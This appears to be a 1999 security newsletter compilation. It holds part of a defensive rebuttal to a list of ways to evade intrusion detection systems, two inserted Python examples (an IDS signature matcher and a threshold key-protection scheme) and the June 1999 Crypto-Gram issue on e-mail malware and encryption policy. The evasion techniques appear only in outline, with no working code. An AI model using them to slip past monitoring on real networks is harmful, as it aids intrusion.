35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network-based IDS systems, this is often possible by modifying router traffic (as a simple example).

This is a lot like 33. Network based IDS products 'sniff' network traffic. If the traffic isn't there to 'sniff' then there is no intrusion detection. This attack is only valid if the attacker can modify internal network routing and there are other access points for the traffic to flow. Many network IDS products also detect when there are attempts to re-route traffic.

36 - Break into an intermediary to break the traceback of the attack. The intrusion may be detected, but they won't be able to trace it to you (unless they are very good at traces).

The original article was entitled "50 Ways to Defeat Your Intrusion Detection System". This method does not defeat detection, only the chance that the ultimate target will figure out exactly who is doing the attacking. One could also argue that the intermediary target is just as likely to detect an attack as the ultimate target.

37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems.

This assumes that an attacker already has access to a system on the target network.
Brand new attacks don't start this way. There are a wide variety of programs such as NetCat which can be used to open up ports in unusual places. Many of these programs are detected by network IDS products. Some of them, such as RealSecure, even detect LOKI ICMP sessions. 38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11 and VAX encoding for examples). This simply "encrypts" a network communication. It assumes that there is a cooperating system on the target network. 39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand the content. And if the target network has an IPX based IDS it will pick up the attack accordingly. 40 - Use a different tunneled protocol session for the attack - such as IP over HTML. This is another communication encryption technique. ------------------------------------------------------------------------ Bonus Attack - Define your own protocol for a new application and attack over it. ------------------------------------------------------------------------ See 40. If you have access to a system, write your own encrypted pipe and then communicate with it from someplace else in front of an IDS, this is not defeating the IDS. None of these methods consider all of the poking and prodding that it may take to find the right combination of IP protocol or TCP/UDP source port to bypass a firewall. 41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity. Absolutely. See 34. 42 - Create large numbers of false positives to increase noise level. This will make finding the real attack human time intensive and people tend to fail under these circumstances. Interesting point, but consider that network management systems are designed to process and present information that could not be understood by any human. IDS systems are the same way. 
For example with Dragon (shameless product placement) there are a variety of different tools to look at different data at many different levels of abstraction. Tools from companies such as WebTrends tend to present all sorts of security information in a very easy to understand format. And I am of the opinion that the last thing an attack may want to do is put a target on high alert. 43 - Plant the intrusion instructions within a Word macro and send a document to the victim. The IDS probably can't decode the attack inside the macro. See 34. Some products such as RealSecure do look for suspicious JAVA and ActiveX downloads. Proxy firewalls that perform virus checking may also identify this attack. 44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or ... you get the idea. See 43 & 34. This is another example of how these 50 techniques are not 50 unique techniques. 45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack and run it for you. This is a classic all time attack. Common Trojan Horses can be detected by many host based and network based IDS products. Some firewalls now even recognize Back-Orifice scans. On the other hand, this is one of the most serious problems in computer security today. It is almost impossible to examine binary programs or even source code and predict exactly what the program will do. So, yeah, IDS products can't do this, but it's not a compelling reason to throw away your IDS. Most IDS or firewall products can't discover when you're about to send sensitive corporate information via email either. 46 - Use a rarely used protocol for the attack. Chances are the IDS doesn't know how to interpret the packets. Protocol is not a well defined term. If this is meant as a different UDP/TCP port then the network IDS would need to understand what it is looking for. But this is how most network based IDS products work. 
They only look for things they understand or can understand to be suspicious. If this attack represents other IP protocols than ICMP, UDP and TCP, then most IDS products can be configured to alert on them.

47 - Recode the attack in a different language than it was originally published in.

I don't think this works. Consider the check-cgi program that has been floating around for a few months now and checks for 70+ vulnerable CGI-BIN programs. It has been ported from C to Rebol without any difference at the network layer. This attack only works if the IDS is searching for a specific binary program. Most traditional IDS products don't do this.

48 - Use any non-technical attack (such as so-called human engineering). Since the IDS only looks at bits and bytes, it doesn't detect many of the common attacks used by attackers today.

Yes, but building alarm systems, background checks, cameras, employee training programs and many other systems are available to thwart these techniques. There are even legal techniques to prevent competitors from hiring away key personnel.

49 - Attack any system that doesn't run Unix. Since almost all of today's IDS systems only look for Unix attacks, everything else will pass undetected. (Some apparently detect NT attacks now as well.)

A quick survey reveals that NetProwler, NFR Flight Jacket, NetRanger, RealSecure, Dragon and BlackICE all detect a multitude of Windows NT attacks.

50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest number of detected attacks I have seen advertised to date as being detected by any such system is only about 50. (One vendor recently claimed over 150, but the newest numbers I heard for known vulnerabilities have gone up to 2,000.) Nevertheless, 150 is progress over 50!

Where are these published 1000 attacks? When checking sites like Packetstorm and Rootshell, most of the major attacks are covered by IDS products.
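The detection side of items 38 and 47, as an added example that is not part of the paper or of any product it names: a minimal content-signature matcher run over constructed HTTP request bytes. A CGI probe reaches the wire as the same bytes whether its scanner was written in C or Rebol, so a content signature fires on either (item 47); a copy of the same request with the bytes of each word swapped (item 38) is only caught once the sensor normalises the stream with the matching decoder. The signature names, the signature strings and the request are constructed for illustration and are not any vendor's rule set.

```python
"""Content-signature matching with stream normalisation (added example)."""

# Constructed content signatures: byte strings a network IDS would look for
# in a request to a well-known, historically abused CGI program. Real rule
# sets carry many more fields (ports, direction, offsets); this keeps only
# the content test the discussion is about.
SIGNATURES = {
    "cgi-phf-probe": b"/cgi-bin/phf",
    "cgi-test-cgi-probe": b"/cgi-bin/test-cgi",
}


def probe_request(path: str) -> bytes:
    """Constructed HTTP/1.0 request such as a CGI scanner would emit. Item
    47's point is that a C port and a Rebol port of the scanner produce the
    same bytes here, so one generator is enough to model both."""
    return f"GET {path} HTTP/1.0\r\n\r\n".encode("ascii")


def swap_word_bytes(data: bytes) -> bytes:
    """Swap the two bytes of every 16-bit word (item 38's 'reverse bytes on
    words'). The transform is its own inverse, so the sensor applies it once
    to recover the original stream; an odd trailing byte stays in place."""
    out = bytearray(data)
    for i in range(0, len(data) - 1, 2):
        out[i], out[i + 1] = data[i + 1], data[i]
    return bytes(out)


# Normalisers the sensor tries before matching. Every extra decoder widens
# what the sensor can see at the cost of more work per packet and more
# chances of a false positive, so a real sensor enables them per policy.
DECODERS = {
    "raw": lambda d: d,
    "word-swapped": swap_word_bytes,
}


def match_signatures(payload: bytes) -> list:
    """Return sorted (signature, decoder) pairs that hit on the payload.
    The decoder name tells the analyst which normalisation was needed,
    which is itself a useful alert attribute."""
    hits = []
    for dec_name, decode in DECODERS.items():
        view = decode(payload)
        for sig_name, needle in SIGNATURES.items():
            if needle in view:
                hits.append((sig_name, dec_name))
    return sorted(hits)


if __name__ == "__main__":
    req = probe_request("/cgi-bin/phf")
    print(match_signatures(req))                    # hit under the raw view
    print(match_signatures(swap_word_bytes(req)))   # hit only after decoding
```

With only the "raw" decoder enabled the second call returns nothing, which is exactly the gap item 38 relies on; the fix is a decoder in the sensor, not a new signature per encoding.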
There is always an IDS gap where new attacks require new signatures to be developed, but for the most part, published vulnerabilities tend to have IDS products that detect them.

------------------------------------------------------------------------
Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a small number of known attacks.
------------------------------------------------------------------------

See 50-1000+.

Conclusion

It is very hard to measure intrusion detection systems and network security because the topic is extremely vague and subject to opinion. I hope that this paper will cause some debate and generate some discussion about the role intrusion detection can play in our networks. It should be obvious to the reader that the author truly feels that an IDS can be an extremely useful part of a secure network. I do acknowledge that all IDS products could be better and can't save the world, but they should not be discounted so easily.

@HWA

106.0 June 15th: Bruce Schneier's Cryptogram
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mailing-List: contact crypto-gram-help@chaparraltree.com; run by ezmlm
Precedence: bulk
Delivered-To: mailing list crypto-gram@chaparraltree.com
Delivered-To: moderator for crypto-gram@chaparraltree.com
Received: (qmail 11631 invoked from network); 16 Jun 1999 21:14:32 -0000
Message-Id: <4.1.19990616161311.009ebe60@chaparraltree.com>
X-Sender: schneier@counterpane.com (Unverified)
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Wed, 16 Jun 1999 16:14:40 -0500
To: crypto-gram@chaparraltree.com
From: Bruce Schneier
Subject: CRYPTO-GRAM, June 15, 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

CRYPTO-GRAM

June 15, 1999

by Bruce Schneier
President
Counterpane Systems
schneier@counterpane.com
http://www.counterpane.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.
Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below. Copyright (c) 1999 by Bruce Schneier ** *** ***** ******* *********** ************* In this issue: E-Mail Viruses, Worms, and Trojan Horses Counterpane Systems -- Featured Research News Counterpane Systems News The Doghouse: Shopping.com The Other Doghouse: ChecksNet Hacking Archives on the WWW International Encryption Policy International Encryption Products Comments from Readers ** *** ***** ******* *********** ************* E-Mail Viruses, Worms, and Trojan Horses Looking back from the future, 1999 will have been a pivotal year for malicious software: viruses, worms, and Trojan horses (collectively known as "malware"). It's not more malware; we've already seen thousands. It's not Internet malware; we've seen that before, too. But this is the first year we've seen malware that uses e-mail to propagate over the Internet and tunnel through firewalls. And it's a really big deal. Viruses and worms survive by reproducing on new computers. Before the Internet, computers communicated mostly through floppy disks. Hence, most viruses propagated on floppy disks, and sometimes on computer bulletin board systems (BBSs). There are some obvious effects of floppies as a vector. First, malware propagates slowly. One computer shares a disk with another which shares a disk with five more, and over the course of weeks or months a virus turns into an epidemic. Or maybe someone puts a virus-infected program on a bulletin board, and thousands get infected in a week or two. Second, it's easy to block disk-borne malware. Most anti-virus programs can automatically scan all floppy disks. Malware is blocked at the gate. BBSs can still be a problem, but many computer users are trained never to download software from a BBS. Even so, anti-virus software can automatically scan new files for malware. And third, anti-viral software can easily deal with the problem. 
It's easy to write software to block malware you know about. You simply have the anti-virus scanner search for bit strings that signify the virus (called a "signature") and then execute the automatic program to delete the virus and restore normalcy. This deletion routine is unique per virus, but it is not hard to develop. Anti-viral software has tens of thousands of signatures, each tuned to a particular virus. Companies release them within a day of learning of a new virus. And as long as viruses propagate slowly, this is good enough. My software automatically updates itself once a month. Until 1999, that was enough. What's new in 1999 is e-mail propagation of malware. These programs -- the Melissa virus and its variants, the Worm.ExploreZip worm and its inevitable variants, etc. -- arrive via e-mail and use e-mail features in modern software to replicate themselves across the network. They mail themselves to people known to the infected host, enticing the recipients to open or run them. They don't propagate over weeks and months; they propagate in seconds. Anti-viral software cannot possibly keep up. And e-mail is everywhere. It runs over Internet connections that block everything else. It tunnels through all firewalls. Everyone uses it. It's easy to point fingers at Microsoft. Melissa uses features in Microsoft Word (and variants use Excel) to automatically e-mail itself to others, and Melissa and Worm.ExploreZip make use of the automatic mail features of Microsoft Outlook. Microsoft is certainly to blame for creating the powerful macro capabilities of Word and Excel, blurring the distinction between executable files (which can be dangerous) and data files (which, before now, were safe). They will be to blame when Outlook 2000, which supports HTML, makes it possible for users to be attacked by HTML-based malware simply by opening an e-mail. Microsoft set the security state-of-the-art back 25 years with DOS, and they have continued that legacy to this day. 
They certainly have a lot to answer for, but the meta-problem is more subtle. One problem is the permissive nature of the Internet and the computers attached to it. As long as a program has the ability to do anything on the computer it is running on, malware will be incredibly dangerous. Just as firewalls protect different computers on the same network, we're going to need something similar to protect different processes running on the same computer. This cannot be stopped at the firewall. This type of malware tunnels through a firewall using e-mail, and then pops up on the inside and does damage. So far the examples have been mild, but they represent a proof of concept. And the effectiveness of firewalls will diminish as we open up more services (e-mail, Web, etc.), as we add increasingly complex applications on the internal net, and as crackers catch on. This "tunnel-inside-and-play" technique will only get worse. And anti-virus software can't help much. If a virus can infect 1.2 million computers (one estimate of Melissa infections) in the hours before a fix is released, that's a lot of damage. What if the code took pains to hide itself, so that a virus won't be discovered for a couple of days? What if a worm just targeted an individual; it would delete itself off any computer whose userID didn't match a certain reference? How long would it take before that one is discovered? What if it e-mailed a copy of the user's login script (most contain passwords) to an anonymous e-mail box before self-erasing? What if it automatically encrypted outgoing copies of itself with PGP or S/MIME? Or signed itself; signing keys are often left lying around the system. Even a few minutes of thinking about this yields some pretty scary possibilities. It's impossible to push the problem off onto users with "do you trust this message/macro/application" messages. 
Sure, it's unwise to run executables from strangers, but both Melissa and Worm.ExploreZip arrive pretending to be friends and associates of the recipient. Worm.ExploreZip even replied to real subject lines. Users can't make good security decisions under ideal conditions; they don't stand a chance against a virus capable of social engineering.

What we're seeing here is the convergence of several problems: the permissiveness of networks, interconnections between applications on modern operating systems, e-mail as a vector to tunnel through network defenses and as a means to spread extremely rapidly, and the traditional naivete of users. Simple patches won't fix this. There are some interesting technologies on the horizon that try to mimic the body's own immune system to automatically deal with unknown malware, but I am not very optimistic about them. Sure they'll catch some things, but it will always be possible to design malware specifically to defeat the immune systems.

A large distributed system that communicates at the speed of light is going to have to accept the reality of viral infections at the speed of light. Unless security is designed into the system from the bottom up, we're constantly going to be fighting a holding action.

Melissa:
http://www.zdnet.com/zdnn/stories/news/0,4586,2233116,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2234121,00.html

Worm.ExploreZip:
http://www.zdnet.com/zdnn/stories/news/0,4586,2274306,00.html
http://www.wired.com/news/news/politics/story/20160.html
http://www.symantec.com/press/1999/n990614d.html

** *** ***** ******* *********** *************

Counterpane Systems -- Featured Research

"Protecting Secret Keys with Personal Entropy"
C. Ellison, C. Hall, R. Milbert, and B. Schneier, FUTURE GENERATION COMPUTER SYSTEMS, to appear.

Conventional encryption technology often requires users to protect a secret key by selecting a password or passphrase.
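A worked illustration of the kind of scheme this abstract describes (a key that survives forgetting some answers but not guessing few of them), added here and not the paper's own construction: the secret is split with a Shamir threshold scheme, each share is locked under a hash of one question's answer, and a short per-share check value lets recovery tell a remembered answer from a forgotten one. The questions, answers, the 127-bit field and the use of plain SHA-256 are constructed assumptions for the example.

```python
"""Threshold-protected secret key unlocked by personal-question answers
(added illustration in the spirit of the abstract, not the paper's scheme)."""
import hashlib
import secrets

# Prime field for the Shamir shares: the Mersenne prime 2^127 - 1. Secrets
# and shares are integers below P; a full 128-bit key would need two of them.
P = (1 << 127) - 1


def _normalise(answer: str) -> str:
    """Fold case and whitespace so 'Rover ' and 'rover' count as the same."""
    return " ".join(answer.strip().lower().split())


def _answer_key(question: str, answer: str) -> int:
    """Per-question mask derived from the answer. Plain SHA-256 here; a
    deliberately slow KDF would be the better choice (see the note below)."""
    data = f"{question}\x00{_normalise(answer)}".encode("utf-8")
    return int.from_bytes(hashlib.sha256(data).digest()[:16], "big") % P


def _check_value(key: int) -> str:
    """Short tag that lets recovery reject a wrong answer for this question."""
    return hashlib.sha256(b"check" + key.to_bytes(16, "big")).hexdigest()[:16]


def _eval_poly(coeffs, x: int) -> int:
    acc = 0
    for c in reversed(coeffs):          # Horner's rule mod P
        acc = (acc * x + c) % P
    return acc


def _interpolate_at_zero(points) -> int:
    """Lagrange interpolation of the secret (the polynomial's value at 0)."""
    total = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = num * (-xj) % P
                den = den * (xi - xj) % P
        total = (total + yi * num * pow(den, -1, P)) % P
    return total


def protect_key(secret: int, qa_pairs, threshold: int) -> dict:
    """Split `secret` into one share per (question, answer) and lock share i
    under answer i. Any `threshold` correct answers recover the secret; fewer
    shares reveal nothing about it (only the check values leak anything)."""
    assert 0 <= secret < P and 1 <= threshold <= len(qa_pairs)
    coeffs = [secret] + [secrets.randbelow(P) for _ in range(threshold - 1)]
    shares = []
    for x, (question, answer) in enumerate(qa_pairs, start=1):
        key = _answer_key(question, answer)
        shares.append({"x": x, "question": question,
                       "locked_share": (_eval_poly(coeffs, x) + key) % P,
                       "check": _check_value(key)})
    return {"threshold": threshold, "shares": shares}


def recover_key(protected: dict, answers: dict):
    """Recover the secret from the answers the user still remembers
    (question -> answer). Returns None if fewer than `threshold` check out."""
    good = []
    for share in protected["shares"]:
        answer = answers.get(share["question"])
        if answer is None:
            continue                                # question skipped
        key = _answer_key(share["question"], answer)
        if _check_value(key) != share["check"]:
            continue                                # misremembered answer
        good.append((share["x"], (share["locked_share"] - key) % P))
        if len(good) == protected["threshold"]:
            break
    if len(good) < protected["threshold"]:
        return None
    return _interpolate_at_zero(good)


# Constructed questions and answers for the demonstration.
QUESTIONS = [
    ("Name of your first pet?", "Rover"),
    ("Street you grew up on?", "Elm Street"),
    ("Make and model of your first car?", "Volvo 240"),
    ("Name of your favourite teacher?", "Mrs Hill"),
    ("Your childhood phone number?", "555-0100"),
]

if __name__ == "__main__":
    blob = protect_key(0x1234_5678_9ABC_DEF0, QUESTIONS, threshold=3)
    # Two answers forgotten, others typed with different case and spacing.
    remembered = {QUESTIONS[0][0]: " rover", QUESTIONS[2][0]: "volvo 240",
                  QUESTIONS[4][0]: "555-0100"}
    print(hex(recover_key(blob, remembered)))
    # Only two correct answers: below threshold, nothing comes back.
    print(recover_key(blob, dict(QUESTIONS[:2])))
```

The check values are the part to think hardest about: anyone holding the protected blob can test guesses for each question offline, so the answers need real entropy and the hash should be a slow KDF rather than the bare SHA-256 used here. The threshold is what turns "learn one answer" into the abstract's "learn a large subset".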
While a good passphrase will only be known to the user, it also has the flaw that it must be remembered exactly in order to recover the secret key. As time passes, the ability to remember the passphrase fades and the user may eventually lose access to the secret key. We propose a scheme whereby a user can protect a secret key using the "personal entropy" in his own life, by encrypting the passphrase using the answers to several personal questions. We designed the scheme so the user can forget answers to a subset of the questions and still recover the secret key, while an attacker must learn the answer to a large subset of the questions in order to recover the secret key.

http://www.counterpane.com/personal-entropy.html

** *** ***** ******* *********** *************

News

Hushmail is like Hotmail, but encrypted. They implement SSL from the browser to the server, and Blowfish to encrypt messages. Free secure e-mail for the masses. Their source code is available via free download. Furthermore, they developed their product off-shore, so they don't face any export restrictions. I haven't seen any evaluations of the code, but it's certainly a good idea.
News story:
http://www.wired.com/news/news/email/explode-infobeat/technology/story/19804.html
Hushmail homepage:
http://www.hushmail.com
Technical summary:
https://www.hushmail.com/tech_description.htm
Source code:
http://www.cypherpunks.ai/~hush/hush-src.103.zip
And ZipLip is a competing secure web e-mail service:
http://www.techweb.com/wire/story/TWB19990526S0002
I'll write more about both of these products next month.

The French data agency CNIL is investigating Microsoft and Intel, to determine if their anti-privacy antics violate any European data protection laws.
http://www.europa.eu.int/comm/dg15/en/media/dataprot/wpdocs/wp16en.htm
http://www.europa.eu.int/comm/dg15/en/media/dataprot/wpdocs/wp17en.htm

A report on how 128-bit crypto was liberated in France.
http://jya.com/jospin-coup.htm

The United States has been accused of using key escrow to steal secrets.
http://www.techweb.com/wire/story/TWB19990518S0004
http://www.nytimes.com/techweb/TW_Report_U_S_Uses_Key_Escrow_To_Steal_Secrets.html

How to discuss Blowfish with your children.
http://www.hcs.harvard.edu/~demon/issues/apr_26_1999/blowfish/blowfish.html

There are rumors that the CIA is using computers to attack the foreign bank accounts of Yugoslav leader Milosevic.
http://www.techweb.com/wire/story/reuters/REU19990524S0001

"We've lately had reason to wonder if our nation's cryptography policy is being made by fools. It is a mixed blessing to learn that the people in charge are merely liars." A good editorial.
http://www.zdnet.com/pcweek/stories/columns/0,4351,403283,00.html

OpenSSL, an open-source toolkit for SSL and TLS, version 0.9.3 has been released.
http://www.openssl.org/

Here's a site that provides random primitive and irreducible polynomials, useful for stream-cipher construction.
http://www.dmi.ens.fr/~chabaud/Poly/polyform.html

U.S. banks are opening a lab to test computer security products.
http://www.news.com/News/Item/0,4,36923,00.html

The Electronic Telegraph has an interesting feature on the security of safes: how they're made, how they can be attacked. I never realized that safes were rated according to how much insurance you can get on cash contents.
http://www.telegraph.co.uk:80/et?ac=000647321007942&rtmo=Q9QwSezR&atmo=99999999&pg=/et/99/5/13/ecfsafe13.html

Good news department: The U.K. has reversed its position on key escrow. Blair's government has dropped a proposal that would have required it.
http://www.infoworld.com/cgi-bin/displayStory.pl?990527.icblair.htm

Someone wrote an Enigma-machine simulator that runs on an iButton. So you can have an Enigma-machine secret decoder ring.
http://www.javaworld.com/jw-08-1998/jw-08-indepth.html

The National Security Study Group (some government agency or another) launched a web site (http://www.nssg.gov) to encourage and gather public comment on national security in the 21st century. Be nice and don't hack them for a week or so.
http://www.fcw.com/pubs/fcw/1999/0531/fcw-agsitesurv-05-31-99.html

Send secret messages in DNA.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_365000/365183.stm
http://news.excite.com/news/r/990610/02/science-dna-microdot
http://www.cnn.com/NATURE/9906/10/top.secret.dna.ap/

GCHQ, the British NSA-equivalent, is moving. Their new site will house 4500 people, and should be completed by 2002.
http://www.guardianunlimited.co.uk/Archive/Article/0,4273,3862710,00.html

Germany goes on record as being in favor of strong cryptography. It seems they don't trust the U.S. not to spy on them.
http://www.wired.com/news/news/politics/story/20023.html

** *** ***** ******* *********** *************

Counterpane Systems News

The Black Hat Briefings '99 is a Computer Security Conference scheduled for July 7 and 8 in Las Vegas, Nevada. DefCon is a hackers convention held the weekend after. Bruce Schneier will be speaking at both.
http://www.blackhat.com/
http://www.defcon.org/

** *** ***** ******* *********** *************

The Doghouse: Shopping.com

For security-clueless shopping, you can't beat this one: "Shopping.com uses RSA Laboratories commercial encryption suited for U.S. export (RC4-Export, 128 bit with 40 secret). What does that mean to you? RSA protects your sensitive communications over the Internet (such as a credit card number) by transforming the data into an unreadable format. Furthermore, Shopping.com ensures the privacy of the information not only online, but through our back-end systems." Wow. I am in awe.
http://www.shopping.com/store/INFO/INFO_SECURE.ASP?nav=|-1|-1|-1|-1|-1&x=cgi-bin

** *** ***** ******* *********** *************

The Other Doghouse: ChecksNet

You too can send your bank account name and routing information in the clear over the net. Order your checks from these people. Their Web page clearly states: "ChecksNet protects your personal and bank account information from theft or misuse by encoding and scrambling the data as it is transmitted from this website to us." However, the order form is sent in the clear; they don't use SSL.
http://www.checksnet.com/order.htm

** *** ***** ******* *********** *************

Hacking Archives on the WWW

There's a lot of hacking information on the WWW, but you have to take the time to look for it. Typing "hacker archive" into AltaVista results in over three million hits. Yahoo's information is much better organized, but there's still a lot of pages to wade through.

A great starting site is http://www.infoworld.com/cgi-bin/displayNew.pl?/security/links/security_corner.htm. These guys write a weekly security column for InfoWorld, and their site is a wealth of useful security links. When I'm looking for something, I usually go there first.

The content site I spent the most time at was http://www.genocide2600.com/~tattooman/main.shtml, because it seemed well-organized. Nevertheless, it was clear that this is an archive, not a directory. If you're trying to find a particular hack for a particular piece of software on a particular operating system, expect to spend some time searching. The material is sorted by general category, but the descriptions are limited. On the other hand, if you're looking for write-ups of the latest security holes and exploits, it's neatly sorted by date.

For a non-hacker like me, most of this material is way beyond my level of expertise. Still, there's also a fair amount of scary and useful stuff.
Just reading through the archive descriptions is enough to make anyone lose faith in any kind of network security. In addition to the vulnerabilities and exploits, there are Windows, Novell, and Unix security tools; password crackers; miscellaneous hacking tools; general utilities; and -- just in case you'd forgotten that hacking was a subculture -- humor archives. There are also links to archives of hacker discussion lists.

Other archives include:

The Electronic Frontier Foundation "hacker" archive.
http://www.eff.org/pub/Net_culture/Hackers/

The archives for 2600 Magazine and for Phrack Magazine.
http://www.2600.com
http://www.phrack.com

And Netscape's hacker page, with links to major hacker sites on the Web.
http://excite.netscape.com/computing_and_internet/programming/hacking

This last one is the Web page I found most interesting, in the abstract. Hacking has come of age, if Netscape lists the links openly, instead of trying to pretend they don't exist. In general, hackers (at least in their public face) are more interested in penetrating systems and exposing vulnerabilities than in causing damage or stealing money. But most sites still have legal disclaimers about how the information is only for educational purposes and is not intended to be used to commit the crimes that could be attributed to the information provided. First amendment or not, much of this is a gray area.

** *** ***** ******* *********** *************

International Encryption Policy

EPIC has released its "Cryptography & Liberty 1999: An International Survey of Encryption Policy." This is an excellent survey on international encryption policy (it runs about 130 pages), produced by the Electronic Privacy Information Center (EPIC). Here's the executive summary:

"Most countries in the world today have no controls on the use of cryptography. In the vast majority of countries, cryptography may be freely used, manufactured, and sold without restriction.
This is true for both leading industrial countries and for developing countries. There is a movement towards international relaxation of regulations relating to encryption products, coupled with a rejection of key escrow and recovery policies. Many countries have recently adopted policies expressly rejecting requirements for key escrow systems and a few countries, most notably France, have dropped their escrow systems. There are a small number of countries where strong domestic controls on the use of cryptography exist. These are mostly countries where human rights command little respect. "Recent trends in international law and policy point toward continued relaxation of controls on cryptography. The Organization for Economic Cooperation and Development's Cryptography Policy Guidelines and the Ministerial Declaration of the European Union, both released in 1997, argue for the liberalization of controls on cryptography and the development of market-based, user driven cryptography products and services. There is a growing awareness worldwide of encryption and an increasing number of countries have developed policies, driven by the OECD guidelines. "Export controls remain the most powerful obstacle to the development and free flow of encryption. The revised December 1998 Wassenaar Arrangement may roll back some of the liberalization sought by the OECD, particularly by restricting the key lengths of encryption products that can be exported without approval licenses. However, several major countries have already indicated that they do not plan to adopt new restrictions. "The United States government continues to lead efforts for encryption controls around the world. The U.S. government has exerted economic and diplomatic pressure on other countries in an attempt to force them into adopting restrictive policies. The U.S. 
position may be explained, in part, by the dominant role that national intelligence and federal law enforcement agencies hold in the development of encryption policy." http://www2.epic.org/reports/crypto1999.html ** *** ***** ******* *********** ************* International Encryption Products The ACP has commissioned a study on the availability of international encryption products. It's called "Growing Development of Foreign Encryption Products in the Face of U.S. Export Regulations." Here are excerpts from the executive summary: "Development of cryptographic products outside the United States is not only continuing but is expanding to additional countries; with rapid growth of the Internet, communications-related cryptography especially is experiencing high growth, especially in electronic mail, virtual private network, and IPsec products. This report surveys encryption products developed outside the United States and provides some information on the effect of the United States export control regime on American and foreign manufacturers. "We have identified 805 hardware and/or software products incorporating cryptography manufactured in 35 countries outside the United States. The most foreign cryptographic products are manufactured in the United Kingdom, followed by Germany, Canada, Australia, Switzerland, Sweden, the Netherlands, and Israel in that order. Other countries accounted for slightly more than a quarter of the world's total of encryption products. "The 805 foreign cryptographic products represent a 149-product increase (22%) over the most recent previous survey in December 1997. A majority of the new foreign cryptographic products are software rather than hardware. Also, a majority of these new products are communications-oriented rather than data storage oriented; they heavily tend towards secure electronic mail, IP security (IPsec), and Virtual Private Network applications. 
"We identified at least 167 foreign cryptographic products that use strong encryption in the form of these algorithms: Triple DES, IDEA, Blowfish, RC5, or CAST-128. Despite the increasing use of these stronger alternatives to DES, there also continues to be a large number of foreign products offering the use of DES, though we expect to see a decrease in coming years. "On average, the quality of foreign and U. S. products is comparable. There are a number of very good foreign encryption products that are quite competitive in strength, standards compliance, and functionality." http://www.seas.gwu.edu/seas/institutes/cpi/library/docs/cpi-1999-02.pdf ** *** ***** ******* *********** ************* Comments from Readers From: "John C. Kennedy" Subject: Novell Having worked with Novell's security group closely for the last three and a half years on cryptographic and network security issues, I want to point out a couple of things that aren't quite apparent about the remote console password encryption hack that you report on in your latest newsletter. (Disclaimer: This is in no way an official response from Novell, merely a constructive comment by an informed party.) The use of the remote console feature for managing NetWare servers is something that Novell has advised against for quite some time to begin with. Server console access is something that Novell strongly recommends be protected by physical access restrictions: http://developer.novell.com/research/appnotes/1997/november/06/04.htm Novell's security experts have *always* considered the use of remote console capabilities to be a fundamentally risky proposition to begin with. Console access allows direct access to the NetWare trusted computing base. However, when customers demand such a feature and are willing to take the risk it is difficult for any company to say no. 
If one assesses network security from a "weakest link in the chain" perspective, it is the fact that access to console services is available remotely *at all* that is probably a bigger risk than the weak password encryption technique employed. Console access is not something that should be granted based simply on single factor authentication, but in many "low threat" environments this is an acceptable risk/convenience trade-off to make.

The password obfuscation technique may seem amateurish at first glance, but it most likely has more to do with some exportability issue than lack of expertise or knowledge within Novell's security group. The design pre-dates my association with Novell by a couple of years, but I am confident that it was not due to ignorance within the security staff. Obfuscation techniques are not something anyone likes to bet the farm on, and Novell's strong caveats about the use of rconsole reflect this.

Novell has been working for the last couple of years on an architecture to permit strong encryption for authentication purposes without allowing that same capability to be exploited as an uncontrolled method for confidentiality. This is not an easy problem to tackle, but Novell's new international cryptographic services architecture in fact solves this "crypto with a hole" problem for both Novell and its customers. (http://www.novell.com/corp/security/)

Regardless of one's position on the crypto export issue, we all know that this has been a real problem for software and hardware vendors for quite some time. It is especially difficult to solve for companies that ship to so many different import/export jurisdictions. U.S. export laws are matched by equally restrictive import laws in many countries. The ability to field policy-controlled crypto will allow Novell to bring new network security mechanisms to the global market based on cryptography that is "strong" by anyone's measure.
I think your chastising of Novell is well-intentioned, but fails to acknowledge that (1) weak cryptography *is not* always the weakest link in the security chain and (2) that import/export laws have had predictable and, to date, largely unavoidable results in software designs destined for global markets. So-called "strong cryptography" can lend a false sense of security or be otherwise counterproductive when viewed in the larger context that many vendors have to address. A context that, in fact, most casual observers have neither the patience nor the necessary intimate knowledge to address.

From: "Robert A. Lerche"
Subject: Microsoft's Internet Explorer

MS IE does not provide a means for encrypting downloaded personal certificates. Netscape prompts for a password and encrypts local storage (although I think you're allowed to specify a blank password), but MS IE doesn't.

From: "Jack Hewlett"
Subject: Who's at risk?

You continually publish articles saying how bad various security software products are. So the obvious question is, "Who's at risk here, the Retailer or the Consumer?" I've never understood the need to be secretive about my Credit Card Numbers. It seems to me, I could publish my Credit Card number in the newspaper, and "I" would not be at any risk! If a charge appears on my monthly statement and I can show the following:

1. The merchandise was NOT shipped to my address.
2. The Retailer does NOT have a piece of paper containing my signature.
3. The Retailer does NOT have a recording containing my voice.

then surely I'm under no legal obligation to pay that portion of the bill. This is a very important topic for the individual. If all the risk associated with weak security software falls on the Retailer, then I don't have to care about this topic. If my suppositions are incorrect, then how do I protect myself against all the clerks who see my Credit Card Number when I use it in a retail establishment?
